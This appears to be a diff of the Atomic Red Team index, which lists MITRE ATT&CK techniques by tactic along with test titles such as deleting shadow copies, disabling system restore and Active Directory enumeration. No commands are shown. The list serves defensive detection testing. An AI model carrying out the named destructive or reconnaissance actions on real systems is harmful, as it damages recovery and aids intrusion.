- T1561.002 Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1561 Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491.002 External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1495 Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1565 Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1561.001 Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1561.002 Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1561 Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1491.002 External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1495 Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1490 Inhibit System Recovery](../../T1490/T1490.md)
- Atomic Test #1: Windows - Delete Volume Shadow Copies [windows]
- Atomic Test #2: Windows - Delete Volume Shadow Copies via WMI [windows]
- Atomic Test #3: Windows - wbadmin Delete Windows Backup Catalog [windows]
- Atomic Test #3: Windows - Delete Windows Backup Catalog [windows]
- Atomic Test #4: Windows - Disable Windows Recovery Console Repair [windows]
- Atomic Test #5: Windows - Delete Volume Shadow Copies via WMI with PowerShell [windows]
- Atomic Test #6: Windows - Delete Backup Files [windows]
- Atomic Test #7: Windows - wbadmin Delete systemstatebackup [windows]
- Atomic Test #8: Windows - Disable the SR scheduled task [windows]
- Atomic Test #9: Disable System Restore Through Registry [windows]
- [T1491.001 Internal Defacement](../../T1491.001/T1491.001.md)
- Atomic Test #1: Replace Desktop Wallpaper [windows]
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.001 OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1491.001 Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1499.001 OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1496 Resource Hijacking](../../T1496/T1496.md)
- Atomic Test #1: macOS/Linux - Simulate CPU Load with Yes [macos, linux]
- T1565.003 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565.003 Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1489 Service Stop](../../T1489/T1489.md)
- Atomic Test #1: Windows - Stop service using Service Controller [windows]
- Atomic Test #2: Windows - Stop service using net.exe [windows]
- Atomic Test #3: Windows - Stop service by killing process [windows]
- T1565.001 Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565.001 Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1529 System Shutdown/Reboot](../../T1529/T1529.md)
- Atomic Test #1: Shutdown System - Windows [windows]
- Atomic Test #2: Restart System - Windows [windows]
@@ -1335,43 +888,30 @@
- Atomic Test #7: Reboot System via `halt` - Linux [linux]
- Atomic Test #8: Shutdown System via `poweroff` - Linux [linux]
- Atomic Test #9: Reboot System via `poweroff` - Linux [linux]
- T1565.002 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1565.002 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# discovery
- T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087 Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1010 Application Window Discovery](../../T1010/T1010.md)
- Atomic Test #1: List Process Main Windows - C# .NET [windows]
- [T1217 Browser Bookmark Discovery](../../T1217/T1217.md)
- Atomic Test #1: List Mozilla Firefox Bookmark Database Files on Linux [linux]
- Atomic Test #2: List Mozilla Firefox Bookmark Database Files on macOS [macos]
- Atomic Test #3: List Google Chrome Bookmark JSON Files on macOS [macos]
- Atomic Test #4: List Google Chrome / Opera Bookmarks on Windows with powershell [windows]
- Atomic Test #4: List Google Chrome Bookmarks on Windows with powershell [windows]
- Atomic Test #5: List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt [windows]
- Atomic Test #6: List Mozilla Firefox bookmarks on Windows with command prompt [windows]
- Atomic Test #7: List Internet Explorer Bookmarks using the command prompt [windows]
- Atomic Test #8: List Safari Bookmarks on MacOS [macos]
- T1087.004 Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1069.003 Cloud Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1580 Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1538 Cloud Service Dashboard [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1526 Cloud Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1619 Cloud Storage Object Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1613 Container and Resource Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087.004 Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1069.003 Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1538 Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1526 Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1087.002 Domain Account](../../T1087.002/T1087.002.md)
- Atomic Test #1: Enumerate all accounts (Domain) [windows]
- Atomic Test #2: Enumerate all accounts via PowerShell (Domain) [windows]
- Atomic Test #3: Enumerate logged on users via CMD (Domain) [windows]
- Atomic Test #4: Automated AD Recon (ADRecon) [windows]
- Atomic Test #5: Adfind -Listing password policy [windows]
- Atomic Test #6: Adfind - Enumerate Active Directory Admins [windows]
- Atomic Test #7: Adfind - Enumerate Active Directory User Objects [windows]
- Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects [windows]
- Atomic Test #9: Enumerate Default Domain Admin Details (Domain) [windows]
- Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation [windows]
- Atomic Test #11: Get-DomainUser with PowerView [windows]
- Atomic Test #12: Enumerate Active Directory Users with ADSISearcher [windows]
- Atomic Test #13: Enumerate Linked Policies In ADSISearcher Discovery [windows]
- Atomic Test #14: Enumerate Root Domain linked policies Discovery [windows]
- [T1069.002 Domain Groups](../../T1069.002/T1069.002.md)
- Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows]
- Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows]
@@ -1380,33 +920,18 @@
- Atomic Test #5: Find local admins on all machines in domain (PowerView) [windows]
- Atomic Test #6: Find Local Admins via Group Policy (PowerView) [windows]
- Atomic Test #7: Enumerate Users Not Requiring Pre Auth (ASRepRoast) [windows]
- Atomic Test #8: Adfind - Query Active Directory Groups [windows]
- Atomic Test #9: Enumerate Active Directory Groups with Get-AdGroup [windows]
- Atomic Test #10: Enumerate Active Directory Groups with ADSISearcher [windows]
- Atomic Test #11: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting) [windows]
- Atomic Test #12: Get-DomainGroupMember with PowerView [windows]
- Atomic Test #13: Get-DomainGroup with PowerView [windows]
- [T1482 Domain Trust Discovery](../../T1482/T1482.md)
- Atomic Test #1: Windows - Discover domain trusts with dsquery [windows]
- Atomic Test #2: Windows - Discover domain trusts with nltest [windows]
- Atomic Test #3: Powershell enumerate domains and forests [windows]
- Atomic Test #4: Adfind - Enumerate Active Directory OUs [windows]
- Atomic Test #5: Adfind - Enumerate Active Directory Trusts [windows]
- Atomic Test #6: Get-DomainTrust with PowerView [windows]
- Atomic Test #7: Get-ForestTrust with PowerView [windows]
- T1087.003 Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1087.003 Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1083 File and Directory Discovery](../../T1083/T1083.md)
- Atomic Test #1: File and Directory Discovery (cmd.exe) [windows]
- Atomic Test #2: File and Directory Discovery (PowerShell) [windows]
- Atomic Test #3: Nix File and Directory Discovery [macos, linux]
- Atomic Test #3: Nix File and Diectory Discovery [macos, linux]
- Atomic Test #4: Nix File and Directory Discovery 2 [macos, linux]
- Atomic Test #5: Simulating MAZE Directory Enumeration [windows]
- [T1615 Group Policy Discovery](../../T1615/T1615.md)
- Atomic Test #1: Display group policy information via gpresult [windows]
- Atomic Test #2: Get-DomainGPO to display group policy information via PowerView [windows]
- T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1087.001 Local Account](../../T1087.001/T1087.001.md)
- Atomic Test #1: Enumerate all accounts (Local) [linux]
- Atomic Test #1: Enumerate all accounts (Local) [linux, macos]
- Atomic Test #2: View sudoers access [linux, macos]
- Atomic Test #3: View accounts with UID 0 [linux, macos]
- Atomic Test #4: List opened files by user [linux, macos]
@@ -1416,26 +941,21 @@
- Atomic Test #8: Enumerate all accounts on Windows (Local) [windows]
- Atomic Test #9: Enumerate all accounts via PowerShell (Local) [windows]
- Atomic Test #10: Enumerate logged on users via CMD (Local) [windows]
- Atomic Test #11: Enumerate logged on users via PowerShell [windows]
- [T1069.001 Local Groups](../../T1069.001/T1069.001.md)
- Atomic Test #1: Permission Groups Discovery (Local) [macos, linux]
- Atomic Test #2: Basic Permission Groups Discovery Windows (Local) [windows]
- Atomic Test #3: Permission Groups Discovery PowerShell (Local) [windows]
- Atomic Test #4: SharpHound3 - LocalAdmin [windows]
- Atomic Test #5: Wmic Group Discovery [windows]
- Atomic Test #6: WMIObject Group Discovery [windows]
- [T1046 Network Service Scanning](../../T1046/T1046.md)
- Atomic Test #1: Port Scan [linux, macos]
- Atomic Test #2: Port Scan Nmap [linux, macos]
- Atomic Test #3: Port Scan NMap for Windows [windows]
- Atomic Test #4: Port Scan using python [windows]
- [T1135 Network Share Discovery](../../T1135/T1135.md)
- Atomic Test #1: Network Share Discovery [macos]
- Atomic Test #2: Network Share Discovery - linux [linux]
- Atomic Test #3: Network Share Discovery command prompt [windows]
- Atomic Test #4: Network Share Discovery PowerShell [windows]
- Atomic Test #5: View available share drives [windows]
- Atomic Test #6: Share Discovery with PowerView [windows]
- Atomic Test #7: PowerView ShareFinder [windows]
- Atomic Test #1: Network Share Discovery [macos, linux]
- Atomic Test #2: Network Share Discovery command prompt [windows]
- Atomic Test #3: Network Share Discovery PowerShell [windows]
- Atomic Test #4: View available share drives [windows]
- Atomic Test #5: Share Discovery with PowerView [windows]
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #1: Packet Capture Linux [linux]
- Atomic Test #2: Packet Capture macOS [macos]
@@ -1449,17 +969,11 @@
- Atomic Test #5: Examine local password policy - Windows [windows]
- Atomic Test #6: Examine domain password policy - Windows [windows]
- Atomic Test #7: Examine password policy - macOS [macos]
- Atomic Test #8: Get-DomainPolicy with PowerView [windows]
- Atomic Test #9: Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy [windows]
- [T1120 Peripheral Device Discovery](../../T1120/T1120.md)
- Atomic Test #1: Win32_PnPEntity Hardware Inventory [windows]
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1120 Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1057 Process Discovery](../../T1057/T1057.md)
- Atomic Test #1: Process Discovery - ps [macos, linux]
- Atomic Test #2: Process Discovery - tasklist [windows]
- Atomic Test #3: Process Discovery - Get-Process [windows]
- Atomic Test #4: Process Discovery - get-wmiObject [windows]
- Atomic Test #5: Process Discovery - wmic process [windows]
- [T1012 Query Registry](../../T1012/T1012.md)
- Atomic Test #1: Query Registry [windows]
- [T1018 Remote System Discovery](../../T1018/T1018.md)
@@ -1472,16 +986,6 @@
- Atomic Test #7: Remote System Discovery - sweep [linux, macos]
- Atomic Test #8: Remote System Discovery - nslookup [windows]
- Atomic Test #9: Remote System Discovery - adidnsdump [windows]
- Atomic Test #10: Adfind - Enumerate Active Directory Computer Objects [windows]
- Atomic Test #11: Adfind - Enumerate Active Directory Domain Controller Objects [windows]
- Atomic Test #12: Remote System Discovery - ip neighbour [linux]
- Atomic Test #13: Remote System Discovery - ip route [linux]
- Atomic Test #14: Remote System Discovery - ip tcp_metrics [linux]
- Atomic Test #15: Enumerate domain computers within Active Directory using DirectorySearcher [windows]
- Atomic Test #16: Enumerate Active Directory Computers with Get-AdComputer [windows]
- Atomic Test #17: Enumerate Active Directory Computers with ADSISearcher [windows]
- Atomic Test #18: Get-DomainController with PowerView [windows]
- Atomic Test #19: Get-wmiobject to Enumerate Domain Controllers [windows]
- [T1518.001 Security Software Discovery](../../T1518.001/T1518.001.md)
- Atomic Test #1: Security Software Discovery [windows]
- Atomic Test #2: Security Software Discovery - powershell [windows]
@@ -1497,7 +1001,6 @@
- Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
- Atomic Test #2: Detect Virtualization Environment (Windows) [windows]
- Atomic Test #3: Detect Virtualization Environment (MacOS) [macos]
- Atomic Test #4: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) [windows]
- [T1082 System Information Discovery](../../T1082/T1082.md)
- Atomic Test #1: System Information Discovery [windows]
- Atomic Test #2: System Information Discovery [macos]
@@ -1507,128 +1010,30 @@
- Atomic Test #6: Hostname Discovery (Windows) [windows]
- Atomic Test #7: Hostname Discovery [linux, macos]
- Atomic Test #8: Windows MachineGUID Discovery [windows]
- Atomic Test #9: Griffon Recon [windows]
- Atomic Test #10: Environment variables discovery on windows [windows]
- Atomic Test #11: Environment variables discovery on macos and linux [macos, linux]
- Atomic Test #12: Show System Integrity Protection status (MacOS) [macos]
- [T1614.001 System Language Discovery](../../T1614.001/T1614.001.md)
- Atomic Test #1: Discover System Language by Registry Query [windows]
- Atomic Test #2: Discover System Language with chcp [windows]
- T1614 System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1016 System Network Configuration Discovery](../../T1016/T1016.md)
- Atomic Test #1: System Network Configuration Discovery on Windows [windows]
- Atomic Test #2: List Windows Firewall Rules [windows]
- Atomic Test #3: System Network Configuration Discovery [macos, linux]
- Atomic Test #4: System Network Configuration Discovery (TrickBot Style) [windows]
- Atomic Test #5: List Open Egress Ports [windows]
- Atomic Test #6: Adfind - Enumerate Active Directory Subnet Objects [windows]
- Atomic Test #7: Qakbot Recon [windows]
- Atomic Test #8: List macOS Firewall Rules [macos]
- Atomic Test #6: List macOS Firewall Rules [macos]
- [T1049 System Network Connections Discovery](../../T1049/T1049.md)
- Atomic Test #1: System Network Connections Discovery [windows]
- Atomic Test #2: System Network Connections Discovery with PowerShell [windows]
- Atomic Test #3: System Network Connections Discovery Linux & MacOS [linux, macos]
- Atomic Test #4: System Discovery using SharpView [windows]
- [T1033 System Owner/User Discovery](../../T1033/T1033.md)
- Atomic Test #1: System Owner/User Discovery [windows]
- Atomic Test #2: System Owner/User Discovery [linux, macos]
- Atomic Test #3: Find computers where user has session - Stealth mode (PowerView) [windows]
- Atomic Test #4: User Discovery With Env Vars PowerShell Script [windows]
- Atomic Test #5: GetCurrent User with PowerShell Script [windows]
- [T1007 System Service Discovery](../../T1007/T1007.md)
- Atomic Test #1: System Service Discovery [windows]
- Atomic Test #2: System Service Discovery - net.exe [windows]
- Atomic Test #3: System Service Discovery - systemctl [linux]
- [T1124 System Time Discovery](../../T1124/T1124.md)
- Atomic Test #1: System Time Discovery [windows]
- Atomic Test #2: System Time Discovery - PowerShell [windows]
- Atomic Test #3: System Time Discovery in macOS [macos]
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# resource-development
- T1583 Acquire Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1583.005 Botnet [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1584.005 Botnet [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1587.002 Code Signing Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1588.003 Code Signing Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1586 Compromise Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1584 Compromise Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1583.002 DNS Server [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1584.002 DNS Server [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1587 Develop Capabilities [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1587.003 Digital Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1588.004 Digital Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1583.001 Domains [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1584.001 Domains [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1608.004 Drive-by Target [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1585.002 Email Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1586.002 Email Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1585 Establish Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1587.004 Exploits [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1588.005 Exploits [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1608.003 Install Digital Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1608.005 Link Target [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1587.001 Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1588.001 Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1588 Obtain Capabilities [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1583.004 Server [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1584.004 Server [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1585.001 Social Media Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1586.001 Social Media Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1608 Stage Capabilities [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1588.002 Tool [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1608.001 Upload Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1608.002 Upload Tool [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1583.003 Virtual Private Server [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1584.003 Virtual Private Server [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1588.006 Vulnerabilities [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1583.006 Web Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1584.006 Web Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# reconnaissance
- T1595 Active Scanning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1591.002 Business Relationships [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1596.004 CDNs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1592.004 Client Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1589.001 Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1590.002 DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1596.001 DNS/Passive DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1591.001 Determine Physical Locations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1596.003 Digital Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1590.001 Domain Properties [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1589.002 Email Addresses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1589.003 Employee Names [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1592.003 Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1592 Gather Victim Host Information [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1589 Gather Victim Identity Information [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1590 Gather Victim Network Information [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1591 Gather Victim Org Information [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1592.001 Hardware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1590.005 IP Addresses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1591.003 Identify Business Tempo [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1591.004 Identify Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1590.006 Network Security Appliances [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1590.004 Network Topology [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1590.003 Network Trust Dependencies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1598 Phishing for Information [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1597.002 Purchase Technical Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1596.005 Scan Databases [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1595.001 Scanning IP Blocks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1597 Search Closed Sources [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1593.002 Search Engines [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1596 Search Open Technical Databases [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1593 Search Open Websites/Domains [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1594 Search Victim-Owned Websites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1593.001 Social Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1592.002 Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1598.002 Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1598.003 Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1598.001 Spearphishing Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1597.001 Threat Intel Vendors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1595.002 Vulnerability Scanning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1596.002 WHOIS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# execution
- [T1059.002 AppleScript](../../T1059.002/T1059.002.md)
@@ -1637,27 +1042,20 @@
- Atomic Test #1: At - Schedule a job [linux]
- [T1053.002 At (Windows)](../../T1053.002/T1053.002.md)
- Atomic Test #1: At.exe Scheduled task [windows]
- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1559.001 Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1175 Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1609 Container Administration Command](../../T1609/T1609.md)
- Atomic Test #1: ExecIntoContainer [containers]
- [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md)
- Atomic Test #1: ListCronjobs [containers]
- Atomic Test #2: CreateCronjob [containers]
- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1559.001 Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1175 Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053.003 Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
- T1610 Deploy Container [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- Atomic Test #2: Cron - Add script to cron folder [macos, linux]
- [T1559.002 Dynamic Data Exchange](../../T1559.002/T1559.002.md)
- Atomic Test #1: Execute Commands [windows]
- Atomic Test #2: Execute PowerShell script via Word DDE [windows]
- Atomic Test #3: DDEAUTO [windows]
- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1061 Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059.007 JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
